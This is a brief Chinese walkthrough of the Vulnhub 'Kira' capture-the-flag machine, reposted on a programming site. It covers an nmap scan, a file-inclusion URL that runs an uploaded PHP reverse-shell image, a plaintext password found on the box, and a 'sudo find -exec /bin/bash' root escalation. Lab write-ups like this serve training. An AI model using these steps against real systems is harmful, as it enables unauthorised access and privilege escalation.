首页 > 编程入门 文章详情

Vulnhub:Kira: CTF靶机

编程入门 行业动态 更新时间:2024-10-25 16:17:24

Vulnhub:Kira: CTF<a href=https://www.elefans.com/category/jswz/34/1753072.html style=靶机"/>

Vulnhub:Kira: CTF靶机

kali:192.168.111.111

靶机:192.168.111.238

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.238

访问80端口

点击upload发现是个上传点

点击language发现存在文件包含

上传php图片马再利用文件包含反弹shell

http://192.168.111.238/language.php?lang=/uploads/php-reverse-shell.jpg

提权

/var/www/html/supersecret-for-aziz/bassam-pass.txt文件中发现bassam用户的密码:Password123!@#

bassam用户sudo权限

提权方法:

提升为root

sudo -u root find . -exec /bin/bash \;

更多推荐

Vulnhub:Kira: CTF靶机

本文发布于:2024-02-26 15:23:19,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1702985.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:靶机   Vulnhub   Kira   CTF

发布评论

评论列表 (有 0 条评论)

最近发表

草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!

热门文章

标签列表